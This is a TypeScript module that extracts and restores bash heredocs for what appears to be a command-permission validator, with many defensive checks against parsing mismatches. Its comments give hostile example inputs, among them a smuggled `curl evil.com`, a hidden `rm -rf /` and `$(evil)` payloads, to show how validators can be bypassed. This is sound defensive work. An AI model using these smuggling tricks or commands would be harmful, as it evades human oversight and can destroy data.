/ utils / bash / heredoc.ts
heredoc.ts
  1  /**
  2   * Heredoc extraction and restoration utilities.
  3   *
  4   * The shell-quote library parses `<<` as two separate `<` redirect operators,
  5   * which breaks command splitting for heredoc syntax. This module provides
  6   * utilities to extract heredocs before parsing and restore them after.
  7   *
  8   * Supported heredoc variations:
  9   * - <<WORD      - basic heredoc
 10   * - <<'WORD'    - single-quoted delimiter (no variable expansion in content)
 11   * - <<"WORD"    - double-quoted delimiter (with variable expansion)
 12   * - <<-WORD     - dash prefix (strips leading tabs from content)
 13   * - <<-'WORD'   - combined dash and quoted delimiter
 14   *
 15   * Known limitations:
 16   * - Heredocs inside backtick command substitution may not be extracted
 17   * - Very complex multi-heredoc scenarios may not be extracted
 18   *
 19   * When extraction fails, the command passes through unchanged. This is safe
 20   * because the unextracted heredoc will either cause shell-quote parsing to fail
 21   * (falling back to treating the whole command as one unit) or require manual
 22   * approval for each apparent subcommand.
 23   *
 24   * @module
 25   */
 26  
 27  import { randomBytes } from 'crypto'
 28  
 29  const HEREDOC_PLACEHOLDER_PREFIX = '__HEREDOC_'
 30  const HEREDOC_PLACEHOLDER_SUFFIX = '__'
 31  
 32  /**
 33   * Generates a random hex string for placeholder uniqueness.
 34   * This prevents collision when command text literally contains "__HEREDOC_N__".
 35   */
 36  function generatePlaceholderSalt(): string {
 37    // Generate 8 random bytes as hex (16 characters)
 38    return randomBytes(8).toString('hex')
 39  }
 40  
 41  /**
 42   * Regex pattern for matching heredoc start syntax.
 43   *
 44   * Two alternatives handle quoted vs unquoted delimiters differently:
 45   *
 46   * Alternative 1 (quoted): (['"]) (\\?\w+) \2
 47   *   Captures the opening quote, then the delimiter word (which MAY include a
 48   *   leading backslash since it's literal inside quotes), then the closing quote.
 49   *   In bash, single quotes make EVERYTHING literal including backslashes:
 50   *     <<'\EOF' → delimiter is \EOF (with backslash)
 51   *     <<'EOF'  → delimiter is EOF
 52   *   Double quotes also preserve backslashes before non-special chars:
 53   *     <<"\EOF" → delimiter is \EOF
 54   *
 55   * Alternative 2 (unquoted): \\?(\w+)
 56   *   Optionally consumes a leading backslash (escape), then captures the word.
 57   *   In bash, an unquoted backslash escapes the next character:
 58   *     <<\EOF → delimiter is EOF (backslash consumed as escape)
 59   *     <<EOF  → delimiter is EOF (plain)
 60   *
 61   * SECURITY: The backslash MUST be inside the capture group for quoted
 62   * delimiters but OUTSIDE for unquoted ones. The old regex had \\? outside
 63   * the capture group unconditionally, causing <<'\EOF' to extract delimiter
 64   * "EOF" while bash uses "\EOF", allowing command smuggling.
 65   *
 66   * Note: Uses [ \t]* (not \s*) to avoid matching across newlines, which would be
 67   * a security issue (could hide commands between << and the delimiter).
 68   */
 69  const HEREDOC_START_PATTERN =
 70    // eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by command.includes('<<') at extractHeredocs() entry
 71    /(?<!<)<<(?!<)(-)?[ \t]*(?:(['"])(\\?\w+)\2|\\?(\w+))/
 72  
 73  export type HeredocInfo = {
 74    /** The full heredoc text including << operator, delimiter, content, and closing delimiter */
 75    fullText: string
 76    /** The delimiter word (without quotes) */
 77    delimiter: string
 78    /** Start position of the << operator in the original command */
 79    operatorStartIndex: number
 80    /** End position of the << operator (exclusive) - content on same line after this is preserved */
 81    operatorEndIndex: number
 82    /** Start position of heredoc content (the newline before content) */
 83    contentStartIndex: number
 84    /** End position of heredoc content including closing delimiter (exclusive) */
 85    contentEndIndex: number
 86  }
 87  
 88  export type HeredocExtractionResult = {
 89    /** The command with heredocs replaced by placeholders */
 90    processedCommand: string
 91    /** Map of placeholder string to original heredoc info */
 92    heredocs: Map<string, HeredocInfo>
 93  }
 94  
 95  /**
 96   * Extracts heredocs from a command string and replaces them with placeholders.
 97   *
 98   * This allows shell-quote to parse the command without mangling heredoc syntax.
 99   * After parsing, use `restoreHeredocs` to replace placeholders with original content.
100   *
101   * @param command - The shell command string potentially containing heredocs
102   * @returns Object containing the processed command and a map of placeholders to heredoc info
103   *
104   * @example
105   * ```ts
106   * const result = extractHeredocs(`cat <<EOF
107   * hello world
108   * EOF`);
109   * // result.processedCommand === "cat __HEREDOC_0_a1b2c3d4__" (salt varies)
110   * // result.heredocs has the mapping to restore later
111   * ```
112   */
113  export function extractHeredocs(
114    command: string,
115    options?: { quotedOnly?: boolean },
116  ): HeredocExtractionResult {
117    const heredocs = new Map<string, HeredocInfo>()
118  
119    // Quick check: if no << present, skip processing
120    if (!command.includes('<<')) {
121      return { processedCommand: command, heredocs }
122    }
123  
124    // Security: Paranoid pre-validation. Our incremental quote/comment scanner
125    // (see advanceScan below) does simplified parsing that cannot handle all
126    // bash quoting constructs. If the command contains
127    // constructs that could desync our quote tracking, bail out entirely
128    // rather than risk extracting a heredoc with incorrect boundaries.
129    // This is defense-in-depth: each construct below has caused or could
130    // cause a security bypass if we attempt extraction.
131    //
132    // Specifically, we bail if the command contains:
133    // 1. $'...' or $"..." (ANSI-C / locale quoting — our quote tracker
134    //    doesn't handle the $ prefix, would misparse the quotes)
135    // 2. Backtick command substitution (backtick nesting has complex parsing
136    //    rules, and backtick acts as shell_eof_token for PST_EOFTOKEN in
137    //    make_cmd.c:606, enabling early heredoc closure that our parser
138    //    can't replicate)
139    if (/\$['"]/.test(command)) {
140      return { processedCommand: command, heredocs }
141    }
142    // Check for backticks in the command text before the first <<.
143    // Backtick nesting has complex parsing rules, and backtick acts as
144    // shell_eof_token for PST_EOFTOKEN (make_cmd.c:606), enabling early
145    // heredoc closure that our parser can't replicate. We only check
146    // before << because backticks in heredoc body content are harmless.
147    const firstHeredocPos = command.indexOf('<<')
148    if (firstHeredocPos > 0 && command.slice(0, firstHeredocPos).includes('`')) {
149      return { processedCommand: command, heredocs }
150    }
151  
152    // Security: Check for arithmetic evaluation context before the first `<<`.
153    // In bash, `(( x = 1 << 2 ))` uses `<<` as a BIT-SHIFT operator, not a
154    // heredoc. If we mis-extract it, subsequent lines become "heredoc content"
155    // and are hidden from security validators, while bash executes them as
156    // separate commands. We bail entirely if `((` appears before `<<` without
157    // a matching `))` — we can't reliably distinguish arithmetic `<<` from
158    // heredoc `<<` in that context. Note: $(( is already caught by
159    // validateDangerousPatterns, but bare (( is not.
160    if (firstHeredocPos > 0) {
161      const beforeHeredoc = command.slice(0, firstHeredocPos)
162      // Count (( and )) occurrences — if unbalanced, `<<` may be arithmetic
163      const openArith = (beforeHeredoc.match(/\(\(/g) || []).length
164      const closeArith = (beforeHeredoc.match(/\)\)/g) || []).length
165      if (openArith > closeArith) {
166        return { processedCommand: command, heredocs }
167      }
168    }
169  
170    // Create a global version of the pattern for iteration
171    const heredocStartPattern = new RegExp(HEREDOC_START_PATTERN.source, 'g')
172  
173    const heredocMatches: HeredocInfo[] = []
174    // Security: When quotedOnly skips an unquoted heredoc, we still need to
175    // track its content range so the nesting filter can reject quoted heredocs
176    // that appear INSIDE the skipped unquoted heredoc's body. Without this,
177    // `cat <<EOF\n<<'SAFE'\n$(evil)\nSAFE\nEOF` would extract <<'SAFE' as a
178    // top-level heredoc, hiding $(evil) from validators — even though in bash,
179    // $(evil) IS executed (unquoted <<EOF expands its body).
180    const skippedHeredocRanges: Array<{
181      contentStartIndex: number
182      contentEndIndex: number
183    }> = []
184    let match: RegExpExecArray | null
185  
186    // Incremental quote/comment scanner state.
187    //
188    // The regex walks forward through the command, and match.index is monotonically
189    // increasing. Previously, isInsideQuotedString and isInsideComment each
190    // re-scanned from position 0 on every match — O(n²) when the heredoc body
191    // contains many `<<` (e.g. C++ with `std::cout << ...`). A 200-line C++
192    // heredoc hit ~3.7ms per extractHeredocs call, and Bash security validation
193    // calls extractHeredocs multiple times per command.
194    //
195    // Instead, track quote/comment/escape state incrementally and advance from
196    // the last scanned position. This preserves the OLD helpers' exact semantics:
197    //
198    //   Quote state (was isInsideQuotedString) is COMMENT-BLIND — it never sees
199    //   `#` and never skips characters for being "in a comment". Inside single
200    //   quotes, everything is literal. Inside double quotes, backslash escapes
201    //   the next char. An unquoted backslash run of odd length escapes the next
202    //   char.
203    //
204    //   Comment state (was isInsideComment) observes quote state (# inside quotes
205    //   is not a comment) but NOT the reverse. The old helper used a per-call
206    //   `lineStart = lastIndexOf('\n', pos-1)+1` bound on which `#` to consider;
207    //   equivalently, any physical `\n` clears comment state — including `\n`
208    //   inside quotes (since lastIndexOf was quote-blind).
209    //
210    // SECURITY: Do NOT let comment mode suppress quote-state updates. If `#` put
211    // the scanner in a mode that skipped quote chars, then `echo x#"\n<<...`
212    // (where bash treats `#` as part of the word `x#`, NOT a comment) would
213    // report the `<<` as unquoted and EXTRACT it — hiding content from security
214    // validators. The old isInsideQuotedString was comment-blind; we preserve
215    // that. Both old and new over-eagerly treat any unquoted `#` as a comment
216    // (bash requires word-start), but since quote tracking is independent, the
217    // over-eagerness only affects the comment check — causing SKIPS (safe
218    // direction), never extra EXTRACTIONS.
219    let scanPos = 0
220    let scanInSingleQuote = false
221    let scanInDoubleQuote = false
222    let scanInComment = false
223    // Inside "...": true if the previous char was a backslash (next char is escaped).
224    // Carried across advanceScan calls so a `\` at scanPos-1 correctly escapes
225    // the char at scanPos.
226    let scanDqEscapeNext = false
227    // Unquoted context: length of the consecutive backslash run ending at scanPos-1.
228    // Used to determine if the char at scanPos is escaped (odd run = escaped).
229    let scanPendingBackslashes = 0
230  
231    const advanceScan = (target: number): void => {
232      for (let i = scanPos; i < target; i++) {
233        const ch = command[i]!
234  
235        // Any physical newline clears comment state. The old isInsideComment
236        // used `lineStart = lastIndexOf('\n', pos-1)+1` (quote-blind), so a
237        // `\n` inside quotes still advanced lineStart. Match that here by
238        // clearing BEFORE the quote branches.
239        if (ch === '\n') scanInComment = false
240  
241        if (scanInSingleQuote) {
242          if (ch === "'") scanInSingleQuote = false
243          continue
244        }
245  
246        if (scanInDoubleQuote) {
247          if (scanDqEscapeNext) {
248            scanDqEscapeNext = false
249            continue
250          }
251          if (ch === '\\') {
252            scanDqEscapeNext = true
253            continue
254          }
255          if (ch === '"') scanInDoubleQuote = false
256          continue
257        }
258  
259        // Unquoted context. Quote tracking is COMMENT-BLIND (same as the old
260        // isInsideQuotedString): we do NOT skip chars for being inside a
261        // comment. Only the `#` detection itself is gated on not-in-comment.
262        if (ch === '\\') {
263          scanPendingBackslashes++
264          continue
265        }
266        const escaped = scanPendingBackslashes % 2 === 1
267        scanPendingBackslashes = 0
268        if (escaped) continue
269  
270        if (ch === "'") scanInSingleQuote = true
271        else if (ch === '"') scanInDoubleQuote = true
272        else if (!scanInComment && ch === '#') scanInComment = true
273      }
274      scanPos = target
275    }
276  
277    while ((match = heredocStartPattern.exec(command)) !== null) {
278      const startIndex = match.index
279  
280      // Advance the incremental scanner to this match's position. After this,
281      // scanInSingleQuote/scanInDoubleQuote/scanInComment reflect the parser
282      // state immediately BEFORE startIndex, and scanPendingBackslashes is the
283      // count of unquoted `\` immediately preceding startIndex.
284      advanceScan(startIndex)
285  
286      // Skip if this << is inside a quoted string (not a real heredoc operator).
287      if (scanInSingleQuote || scanInDoubleQuote) {
288        continue
289      }
290  
291      // Security: Skip if this << is inside a comment (after unquoted #).
292      // In bash, `# <<EOF` is a comment — extracting it would hide commands on
293      // subsequent lines as "heredoc content" while bash executes them.
294      if (scanInComment) {
295        continue
296      }
297  
298      // Security: Skip if this << is preceded by an odd number of backslashes.
299      // In bash, `\<<EOF` is NOT a heredoc — `\<` is a literal `<`, then `<EOF`
300      // is input redirection. Extracting it would drop same-line commands from
301      // security checks. The scanner tracks the unquoted backslash run ending
302      // immediately before startIndex (scanPendingBackslashes).
303      if (scanPendingBackslashes % 2 === 1) {
304        continue
305      }
306  
307      // Security: Bail if this `<<` falls inside the body of a previously
308      // SKIPPED heredoc (unquoted heredoc in quotedOnly mode). In bash,
309      // `<<` inside a heredoc body is just text — it's not a nested heredoc
310      // operator. Extracting it would hide content that bash actually expands.
311      let insideSkipped = false
312      for (const skipped of skippedHeredocRanges) {
313        if (
314          startIndex > skipped.contentStartIndex &&
315          startIndex < skipped.contentEndIndex
316        ) {
317          insideSkipped = true
318          break
319        }
320      }
321      if (insideSkipped) {
322        continue
323      }
324  
325      const fullMatch = match[0]
326      const isDash = match[1] === '-'
327      // Group 3 = quoted delimiter (may include backslash), group 4 = unquoted
328      const delimiter = (match[3] || match[4])!
329      const operatorEndIndex = startIndex + fullMatch.length
330  
331      // Security: Two checks to verify our regex captured the full delimiter word.
332      // Any mismatch between our parsed delimiter and bash's actual delimiter
333      // could allow command smuggling past permission checks.
334  
335      // Check 1: If a quote was captured (group 2), verify the closing quote
336      // was actually matched by \2 in the regex (the quoted alternative requires
337      // the closing quote). The regex's \w+ only matches [a-zA-Z0-9_], so
338      // non-word chars inside quotes (spaces, hyphens, dots) cause \w+ to stop
339      // early, leaving the closing quote unmatched.
340      // Example: <<"EO F" — regex captures "EO", misses closing ", delimiter
341      // should be "EO F" but we'd use "EO". Skip to prevent mismatch.
342      const quoteChar = match[2]
343      if (quoteChar && command[operatorEndIndex - 1] !== quoteChar) {
344        continue
345      }
346  
347      // Security: Determine if the delimiter is quoted ('EOF', "EOF") or
348      // escaped (\EOF). In bash, quoted/escaped delimiters suppress all
349      // expansion in the heredoc body — content is literal text. Unquoted
350      // delimiters (<<EOF) perform full shell expansion: $(), backticks,
351      // and ${} in the body ARE executed. When quotedOnly is set, skip
352      // unquoted heredocs so their bodies remain visible to security
353      // validators (they may contain executable command substitutions).
354      const isEscapedDelimiter = fullMatch.includes('\\')
355      const isQuotedOrEscaped = !!quoteChar || isEscapedDelimiter
356      // Note: We do NOT skip unquoted heredocs here anymore when quotedOnly is
357      // set. Instead, we compute their content range and add them to
358      // skippedHeredocRanges, then skip them AFTER finding the closing
359      // delimiter. This lets the nesting filter correctly reject quoted
360      // "heredocs" that appear inside unquoted heredoc bodies.
361  
362      // Check 2: Verify the next character after our match is a bash word
363      // terminator (metacharacter or end of string). Characters like word chars,
364      // quotes, $, \ mean the bash word extends beyond our match
365      // (e.g., <<'EOF'a where bash uses "EOFa" but we captured "EOF").
366      // IMPORTANT: Only match bash's actual metacharacters — space (0x20),
367      // tab (0x09), newline (0x0A), |, &, ;, (, ), <, >. Do NOT use \s which
368      // also matches \r, \f, \v, and Unicode whitespace that bash treats as
369      // regular word characters, not terminators.
370      if (operatorEndIndex < command.length) {
371        const nextChar = command[operatorEndIndex]!
372        if (!/^[ \t\n|&;()<>]$/.test(nextChar)) {
373          continue
374        }
375      }
376  
377      // In bash, heredoc content starts on the NEXT LINE after the operator.
378      // Any content on the same line after <<EOF (like " && echo done") is part
379      // of the command, not the heredoc content.
380      //
381      // SECURITY: The "same line" must be the LOGICAL command line, not the
382      // first physical newline. Multi-line quoted strings extend the logical
383      // line — bash waits for the quote to close before starting to read the
384      // heredoc body. A quote-blind `indexOf('\n')` finds newlines INSIDE
385      // quoted strings, causing the body to start too early.
386      //
387      // Exploit: `echo <<'EOF' '${}\n' ; curl evil.com\nEOF`
388      //   - The `\n` inside `'${}\n'` is quoted (literal newline in a string arg)
389      //   - Bash: waits for `'` to close → logical line is
390      //     `echo <<'EOF' '${}\n' ; curl evil.com` → heredoc body = `EOF`
391      //   - Our old code: indexOf('\n') finds the quoted newline → body starts
392      //     at `' ; curl evil.com\nEOF` → curl swallowed into placeholder →
393      //     NEVER reaches permission checks.
394      //
395      // Fix: scan forward from operatorEndIndex using quote-state tracking,
396      // finding the first newline that's NOT inside a quoted string. Same
397      // quote-tracking semantics as advanceScan (already used to validate
398      // the `<<` operator position above).
399      let firstNewlineOffset = -1
400      {
401        let inSingleQuote = false
402        let inDoubleQuote = false
403        // We start with clean quote state — advanceScan already rejected the
404        // case where the `<<` operator itself is inside a quote.
405        for (let k = operatorEndIndex; k < command.length; k++) {
406          const ch = command[k]
407          if (inSingleQuote) {
408            if (ch === "'") inSingleQuote = false
409            continue
410          }
411          if (inDoubleQuote) {
412            if (ch === '\\') {
413              k++ // skip escaped char inside double quotes
414              continue
415            }
416            if (ch === '"') inDoubleQuote = false
417            continue
418          }
419          // Unquoted context
420          if (ch === '\n') {
421            firstNewlineOffset = k - operatorEndIndex
422            break
423          }
424          // Count backslashes for escape detection in unquoted context
425          let backslashCount = 0
426          for (let j = k - 1; j >= operatorEndIndex && command[j] === '\\'; j--) {
427            backslashCount++
428          }
429          if (backslashCount % 2 === 1) continue // escaped char
430          if (ch === "'") inSingleQuote = true
431          else if (ch === '"') inDoubleQuote = true
432        }
433        // If we ended while still inside a quote, the logical line never ends —
434        // there is no heredoc body. Leave firstNewlineOffset as -1 (handled below).
435      }
436  
437      // If no unquoted newline found, this heredoc has no content - skip it
438      if (firstNewlineOffset === -1) {
439        continue
440      }
441  
442      // Security: Check for backslash-newline continuation at the end of the
443      // same-line content (text between the operator and the newline). In bash,
444      // `\<newline>` joins lines BEFORE heredoc parsing — so:
445      //   cat <<'EOF' && \
446      //   rm -rf /
447      //   content
448      //   EOF
449      // bash joins to `cat <<'EOF' && rm -rf /` (rm is part of the command line),
450      // then heredoc body = `content`. Our extractor runs BEFORE continuation
451      // joining (commands.ts:82), so it would put `rm -rf /` in the heredoc body,
452      // hiding it from all validators. Bail if same-line content ends with an
453      // odd number of backslashes.
454      const sameLineContent = command.slice(
455        operatorEndIndex,
456        operatorEndIndex + firstNewlineOffset,
457      )
458      let trailingBackslashes = 0
459      for (let j = sameLineContent.length - 1; j >= 0; j--) {
460        if (sameLineContent[j] === '\\') {
461          trailingBackslashes++
462        } else {
463          break
464        }
465      }
466      if (trailingBackslashes % 2 === 1) {
467        // Odd number of trailing backslashes → last one escapes the newline
468        // → this is a line continuation. Our heredoc-before-continuation order
469        // would misparse this. Bail out.
470        continue
471      }
472  
473      const contentStartIndex = operatorEndIndex + firstNewlineOffset
474      const afterNewline = command.slice(contentStartIndex + 1) // +1 to skip the newline itself
475      const contentLines = afterNewline.split('\n')
476  
477      // Find the closing delimiter - must be on its own line
478      // Security: Must match bash's exact behavior to prevent parsing discrepancies
479      // that could allow command smuggling past permission checks.
480      let closingLineIndex = -1
481      for (let i = 0; i < contentLines.length; i++) {
482        const line = contentLines[i]!
483  
484        if (isDash) {
485          // <<- strips leading TABS only (not spaces), per POSIX/bash spec.
486          // The line after stripping leading tabs must be exactly the delimiter.
487          const stripped = line.replace(/^\t*/, '')
488          if (stripped === delimiter) {
489            closingLineIndex = i
490            break
491          }
492        } else {
493          // << requires the closing delimiter to be exactly alone on the line
494          // with NO leading or trailing whitespace. This matches bash behavior.
495          if (line === delimiter) {
496            closingLineIndex = i
497            break
498          }
499        }
500  
501        // Security: Check for PST_EOFTOKEN-like early closure (make_cmd.c:606).
502        // Inside $(), ${}, or backtick substitution, bash closes a heredoc when
503        // a line STARTS with the delimiter and contains the shell_eof_token
504        // (`)`, `}`, or backtick) anywhere after it. Our parser only does exact
505        // line matching, so this discrepancy could hide smuggled commands.
506        //
507        // Paranoid extension: also bail on bash metacharacters (|, &, ;, (, <,
508        // >) after the delimiter, which could indicate command syntax from a
509        // parsing discrepancy we haven't identified.
510        //
511        // For <<- heredocs, bash strips leading tabs before this check.
512        const eofCheckLine = isDash ? line.replace(/^\t*/, '') : line
513        if (
514          eofCheckLine.length > delimiter.length &&
515          eofCheckLine.startsWith(delimiter)
516        ) {
517          const charAfterDelimiter = eofCheckLine[delimiter.length]!
518          if (/^[)}`|&;(<>]$/.test(charAfterDelimiter)) {
519            // Shell metacharacter or substitution closer after delimiter —
520            // bash may close the heredoc early here. Bail out.
521            closingLineIndex = -1
522            break
523          }
524        }
525      }
526  
527      // Security: If quotedOnly mode is set and this is an unquoted heredoc,
528      // record its content range for nesting checks but do NOT add it to
529      // heredocMatches. This ensures quoted "heredocs" inside its body are
530      // correctly rejected by the insideSkipped check on subsequent iterations.
531      //
532      // CRITICAL: We do this BEFORE the closingLineIndex === -1 check. If the
533      // unquoted heredoc has no closing delimiter, bash still treats everything
534      // to end-of-input as the heredoc body (and expands $() within it). We
535      // must block extraction of any subsequent quoted "heredoc" that falls
536      // inside that unbounded body.
537      if (options?.quotedOnly && !isQuotedOrEscaped) {
538        let skipContentEndIndex: number
539        if (closingLineIndex === -1) {
540          // No closing delimiter — in bash, heredoc body extends to end of
541          // input. Track the entire remaining range as "skipped body".
542          skipContentEndIndex = command.length
543        } else {
544          const skipLinesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
545          const skipContentLength = skipLinesUpToClosing.join('\n').length
546          skipContentEndIndex = contentStartIndex + 1 + skipContentLength
547        }
548        skippedHeredocRanges.push({
549          contentStartIndex,
550          contentEndIndex: skipContentEndIndex,
551        })
552        continue
553      }
554  
555      // If no closing delimiter found, this is malformed - skip it
556      if (closingLineIndex === -1) {
557        continue
558      }
559  
560      // Calculate end position: contentStartIndex + 1 (newline) + length of lines up to and including closing delimiter
561      const linesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
562      const contentLength = linesUpToClosing.join('\n').length
563      const contentEndIndex = contentStartIndex + 1 + contentLength
564  
565      // Security: Bail if this heredoc's content range OVERLAPS with any
566      // previously-skipped heredoc's content range. This catches the case where
567      // two heredocs share a command line (`cat <<EOF <<'SAFE'`) and the first
568      // is unquoted (skipped in quotedOnly mode). In bash, when multiple heredocs
569      // share a line, their bodies appear SEQUENTIALLY (first's body, then
570      // second's). Both compute contentStartIndex from the SAME newline, so the
571      // second's body search walks through the first's body. For:
572      //   cat <<EOF <<'SAFE'
573      //   $(evil_command)
574      //   EOF
575      //   safe body
576      //   SAFE
577      // ...the quoted <<'SAFE' would incorrectly extract lines 2-4 as its body,
578      // swallowing `$(evil_command)` (which bash EXECUTES via the unquoted
579      // <<EOF's expansion) into the placeholder, hiding it from validators.
580      //
581      // The insideSkipped check above doesn't catch this because the quoted
582      // operator's startIndex is on the command line BEFORE contentStart.
583      // The contentStartPositions dedup check below doesn't catch it because the
584      // skipped heredoc is in skippedHeredocRanges, not topLevelHeredocs.
585      let overlapsSkipped = false
586      for (const skipped of skippedHeredocRanges) {
587        // Ranges [a,b) and [c,d) overlap iff a < d && c < b
588        if (
589          contentStartIndex < skipped.contentEndIndex &&
590          skipped.contentStartIndex < contentEndIndex
591        ) {
592          overlapsSkipped = true
593          break
594        }
595      }
596      if (overlapsSkipped) {
597        continue
598      }
599  
600      // Build fullText: operator + newline + content (normalized form for restoration)
601      // This creates a clean heredoc that can be restored correctly
602      const operatorText = command.slice(startIndex, operatorEndIndex)
603      const contentText = command.slice(contentStartIndex, contentEndIndex)
604      const fullText = operatorText + contentText
605  
606      heredocMatches.push({
607        fullText,
608        delimiter,
609        operatorStartIndex: startIndex,
610        operatorEndIndex,
611        contentStartIndex,
612        contentEndIndex,
613      })
614    }
615  
616    // If no valid heredocs found, return original
617    if (heredocMatches.length === 0) {
618      return { processedCommand: command, heredocs }
619    }
620  
621    // Filter out nested heredocs - any heredoc whose operator starts inside
622    // another heredoc's content range should be excluded.
623    // This prevents corruption when heredoc content contains << patterns.
624    const topLevelHeredocs = heredocMatches.filter((candidate, _i, all) => {
625      // Check if this candidate's operator is inside any other heredoc's content
626      for (const other of all) {
627        if (candidate === other) continue
628        // Check if candidate's operator starts within other's content range
629        if (
630          candidate.operatorStartIndex > other.contentStartIndex &&
631          candidate.operatorStartIndex < other.contentEndIndex
632        ) {
633          // This heredoc is nested inside another - filter it out
634          return false
635        }
636      }
637      return true
638    })
639  
640    // If filtering removed all heredocs, return original
641    if (topLevelHeredocs.length === 0) {
642      return { processedCommand: command, heredocs }
643    }
644  
645    // Check for multiple heredocs sharing the same content start position
646    // (i.e., on the same line). This causes index corruption during replacement
647    // because indices are calculated on the original string but applied to
648    // a progressively modified string. Return without extraction - the fallback
649    // is safe (requires manual approval or fails parsing).
650    const contentStartPositions = new Set(
651      topLevelHeredocs.map(h => h.contentStartIndex),
652    )
653    if (contentStartPositions.size < topLevelHeredocs.length) {
654      return { processedCommand: command, heredocs }
655    }
656  
657    // Sort by content end position descending so we can replace from end to start
658    // (this preserves indices for earlier replacements)
659    topLevelHeredocs.sort((a, b) => b.contentEndIndex - a.contentEndIndex)
660  
661    // Generate a unique salt for this extraction to prevent placeholder collisions
662    // with literal "__HEREDOC_N__" text in commands
663    const salt = generatePlaceholderSalt()
664  
665    let processedCommand = command
666    topLevelHeredocs.forEach((info, index) => {
667      // Use reverse index since we sorted descending
668      const placeholderIndex = topLevelHeredocs.length - 1 - index
669      const placeholder = `${HEREDOC_PLACEHOLDER_PREFIX}${placeholderIndex}_${salt}${HEREDOC_PLACEHOLDER_SUFFIX}`
670  
671      heredocs.set(placeholder, info)
672  
673      // Replace heredoc with placeholder while preserving same-line content:
674      // - Keep everything before the operator
675      // - Replace operator with placeholder
676      // - Keep content between operator and heredoc content (e.g., " && echo done")
677      // - Remove the heredoc content (from newline through closing delimiter)
678      // - Keep everything after the closing delimiter
679      processedCommand =
680        processedCommand.slice(0, info.operatorStartIndex) +
681        placeholder +
682        processedCommand.slice(info.operatorEndIndex, info.contentStartIndex) +
683        processedCommand.slice(info.contentEndIndex)
684    })
685  
686    return { processedCommand, heredocs }
687  }
688  
689  /**
690   * Restores heredoc placeholders back to their original content in a single string.
691   * Internal helper used by restoreHeredocs.
692   */
693  function restoreHeredocsInString(
694    text: string,
695    heredocs: Map<string, HeredocInfo>,
696  ): string {
697    let result = text
698    for (const [placeholder, info] of heredocs) {
699      result = result.replaceAll(placeholder, info.fullText)
700    }
701    return result
702  }
703  
704  /**
705   * Restores heredoc placeholders in an array of strings.
706   *
707   * @param parts - Array of strings that may contain heredoc placeholders
708   * @param heredocs - The map of placeholders from `extractHeredocs`
709   * @returns New array with placeholders replaced by original heredoc content
710   */
711  export function restoreHeredocs(
712    parts: string[],
713    heredocs: Map<string, HeredocInfo>,
714  ): string[] {
715    if (heredocs.size === 0) {
716      return parts
717    }
718  
719    return parts.map(part => restoreHeredocsInString(part, heredocs))
720  }
721  
722  /**
723   * Checks if a command contains heredoc syntax.
724   *
725   * This is a quick check that doesn't validate the heredoc is well-formed,
726   * just that the pattern exists.
727   *
728   * @param command - The shell command string
729   * @returns true if the command appears to contain heredoc syntax
730   */
731  export function containsHeredoc(command: string): boolean {
732    return HEREDOC_START_PATTERN.test(command)
733  }